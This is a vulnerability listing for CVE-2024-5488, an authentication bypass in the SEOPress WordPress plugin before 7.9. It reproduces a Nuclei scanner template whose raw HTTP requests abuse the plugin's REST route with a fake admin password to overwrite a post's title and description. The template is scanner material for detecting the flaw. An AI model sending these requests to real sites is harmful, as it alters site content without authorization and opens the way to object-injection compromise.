CVE-2024-5488: SEOPress < 7.9 - Authentication Bypass

日期: 2025-08-01 | 影响软件: SEOPress | POC: 已公开

漏洞描述

The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.

PoC代码[已公开]

id: CVE-2024-5488

info:
  name: SEOPress < 7.9 - Authentication Bypass
  author: pdresearch,iamnoooob,rootxharsh
  severity: critical
  description: |
    The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.
  reference:
    - https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/
    - https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5488
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-5488
    epss-score: 0.72733
    epss-percentile: 0.98735
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass

flow: http(1) && http(2) && http(3)

variables:
  marker: "{{randstr}}"
  username: "admin"

http:
  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'Sorry, you are not allowed to do that.'
        internal: true

  - raw:
      - |
        PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username+':aaaaaa')}}
        Content-Type: application/x-www-form-urlencoded

        title={{marker}}&description={{marker}}

    matchers:
      - type: word
        part: body
        words:
          - '"code":"success"'
        internal: true

  - raw:
      - |
        GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '"title":"{{marker}}","description":"{{marker}}"'
# digest: 490a004630440220309deb516f2b2d69221c9afb2a4c6e852eef5e937b110e28c2d3f3065315fe75022041b11d708ea361204f0c46349bb6d728b6dede9d63f660ef7f16da17399991df:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-5488.yaml